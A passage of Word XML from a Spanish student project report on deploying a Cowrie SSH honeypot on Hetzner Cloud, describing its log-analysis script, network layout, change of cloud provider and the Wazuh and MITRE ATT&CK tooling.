        <w:t xml:space="preserve">El script cowrie_analyzer.py se ejecuta desde terminal con la siguiente sintaxis:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 cowrie_analyzer.py &lt;fichero.json&gt; --output &lt;directorio/&gt; [--no-geo]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Los parámetros son:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;fichero.json&gt;: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ruta al fichero de logs de Cowrie (obligatorio).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">--output &lt;directorio/&gt;: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">directorio donde se guardan las gráficas PNG y el informe de resumen (obligatorio).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">--no-geo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">omite la geolocalización de IPs (útil para ejecución sin conexión a Internet).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La salida del script se muestra en terminal con formato de texto plano, incluyendo tablas con los rankings de IPs, credenciales y comandos. Las gráficas se generan como ficheros PNG independientes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Interfaz del Honeypot (Vista del Atacante)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lo que el atacante ve al conectarse al puerto 22 es un banner SSH estándar que identifica al servidor como un sistema Ubuntu. Tras autenticarse con credenciales aceptadas por Cowrie, accede a un prompt bash simulado con un filesystem falso que incluye directorios habituales (/etc, /home, /var) y ficheros falsos como /etc/passwd. Los comandos básicos (ls, cat, wget, uname) están emulados; los no reconocidos producen un error «command not found» verosímil.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dashboard de Wazuh (Opcional)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh proporciona un dashboard web (puerto 443 de la VM local) con capacidades de búsqueda, filtrado y visualización de los eventos ingeridos. Los logs de Cowrie se muestran en la sección Discover, donde pueden filtrarse por tipo de evento, IP de origen, rango temporal y otros campos. Se pueden crear visualizaciones personalizadas (gráficas de barras, mapas, tablas) agrupando los eventos por cualquier campo del JSON original.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagrama de Red</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Diagrama de red del proyecto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5038725" cy="31623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38725" cy="3162300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El diagrama de red muestra la topología a nivel de direccionamiento IP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Servidor Cloud: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hetzner asigna la IP pública directamente a la interfaz eth0 del servidor, sin red privada ni traducción de direcciones intermedia. Solo se ha habilitado IPv4: el servidor se creó sin IPv6 porque los scripts de bastionado configuran únicamente el filtrado IPv4.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud Firewall: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cortafuegos gestionado por Hetzner que se aplica al tráfico antes de que llegue al servidor. Es la primera de las dos capas de filtrado del diseño.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratorio Local: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">red interna 192.168.1.0/24. Las máquinas virtuales (Wazuh, Kali) se conectan en modo NAT o bridge según la necesidad. La comunicación con el servidor cloud se realiza por Internet mediante SSH al puerto 2022. El fichero de logs pertenece al usuario sin privilegios cowrie, por lo que se lee con sudo en el servidor y se vuelca por la propia conexión SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tecnología</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A continuación se describen las tecnologías y herramientas utilizadas en el proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Honeypot SSH/Telnet de media interacción, desarrollado en Python y mantenido como proyecto de código abierto en GitHub. Simula un sistema Linux completo con filesystem falso, permite configurar qué credenciales aceptar y registra toda la actividad en formato JSON. Soporta grabación de sesiones TTY y descarga segura de ficheros que los atacantes intentan transferir. En este proyecto, Cowrie constituye el componente central de captura de datos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Hetzner Cloud</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Proveedor cloud europeo en el que se ha desplegado el honeypot. Se utiliza un servidor CX23 (2 vCPU x86 compartidas, 4 GB de RAM y 40 GB de disco) en el centro de datos de Núremberg (Alemania), con Ubuntu Server 24.04 LTS y una dirección IPv4 pública asignada directamente a su interfaz de red. Delante del servidor se configura el Cloud Firewall de Hetzner, que solo admite tráfico entrante TCP a los puertos 22 y 2022 e ICMP. El acceso a la consola está protegido con autenticación en dos pasos, y el servidor se creó con una clave SSH dedicada exclusivamente al proyecto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Plan Inicial y Cambio de Proveedor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El anteproyecto preveía desplegar el servidor en el tier gratuito de Oracle Cloud Infrastructure (OCI), que ofrece instancias ARM (Ampere A1.Flex) de hasta 4 OCPU y 24 GB de RAM sin coste. Sin embargo, estas instancias son muy demandadas y la región de Madrid respondía de forma sistemática con el error «Out of host capacity».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Para intentar obtenerla se desarrolló el script oci_a1_retry.py, que, con el SDK oficial de Oracle para Python, solicitaba la instancia cada minuto (véase el capítulo de Implementación). Tras más de 600 intentos a lo largo de más de un día sin éxito, se valoraron las alternativas gratuitas: la otra instancia gratuita de Oracle (VM.Standard.E2.1.Micro), que no aparecía disponible para la cuenta en la región; el paso a una cuenta de pago de Oracle, que exigía una retención temporal en la tarjeta; Azure for Students, cuya verificación automática no reconoce el dominio de correo del centro; y el nuevo plan gratuito con crédito de AWS, al que no tenía derecho una cuenta creada antes de julio de 2025.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Agotadas las opciones gratuitas, se eligió Hetzner Cloud por tres motivos: el precio cerrado y bajo de sus servidores pequeños, la facturación por horas sin permanencia (el servidor se elimina al terminar el proyecto) y la disponibilidad inmediata. Gracias a que todo el despliegue está automatizado con scripts genéricos para Ubuntu 24.04, el cambio de proveedor solo afectó a la creación de la máquina; los scripts únicamente se adaptaron para que los mensajes no mencionaran Oracle y para crear el usuario administrador cuando el proveedor solo entrega acceso como root, como ocurre en Hetzner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recuperación de Instancias Ociosas</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Mientras Oracle era la plataforma prevista, se analizó además su política de recuperación de instancias ociosas. Oracle se reserva el derecho de recuperar las instancias Always Free que considera ociosas: aquellas que durante 7 días mantienen a la vez un uso de CPU inferior al 20 % (percentil 95), un uso de red inferior al 20 % y, en las instancias A1, un uso de memoria inferior al 20 % (Oracle, s. f.-a). Un honeypot de media interacción cumple las tres condiciones, ya que Cowrie consume muy pocos recursos, por lo que la instancia corría el riesgo de ser recuperada en mitad del periodo de captura.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Dado que las tres condiciones deben cumplirse simultáneamente, basta con evitar una de ellas. Se desarrolló un pequeño servicio, oci-keepalive, que reserva el 25 % de la memoria RAM y la mantiene ocupada sin consumir CPU. El servicio se ejecuta con un usuario efímero sin privilegios, sin acceso a la red ni al sistema de ficheros, y con el uso de swap deshabilitado para garantizar que la reserva permanezca en memoria física. Se descartó la alternativa de generar carga de CPU artificial por ser un consumo innecesario de recursos compartidos. En el despliegue final en Hetzner esta política no existe, y el script de instalación no activa el servicio: lo reserva para instancias A1 de Oracle, que detecta por la etiqueta de chasis OracleCloud.com del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Python 3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Lenguaje de scripting utilizado para el desarrollo del analizador de logs (cowrie_analyzer.py) y el generador de datos de prueba (generate_sample_logs.py). Se emplean las bibliotecas estándar json y collections para el procesamiento de datos, matplotlib para la generación de gráficas, y requests para la geolocalización de IPs mediante la API de ip-api.com.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Wazuh 4.9.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Plataforma SIEM (Security Information and Event Management) de código abierto, derivada de OSSEC. Se instala como componente opcional en una máquina virtual local para la ingesta y visualización de los logs de Cowrie en un dashboard interactivo. Permite configurar reglas de alerta personalizadas para detectar patrones de ataque específicos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Marco de referencia desarrollado por MITRE Corporation que cataloga las tácticas, técnicas y procedimientos (TTPs) utilizados por adversarios en ciberataques reales. Se utiliza en este proyecto para clasificar la actividad observada en el honeypot, proporcionando un lenguaje común que permite comparar hallazgos con la comunidad de ciberseguridad y formular recomendaciones defensivas precisas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Herramientas de Red y Seguridad</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360"/>
        <w:ind w:left="720" w:hanging="357"/>
      </w:pPr>
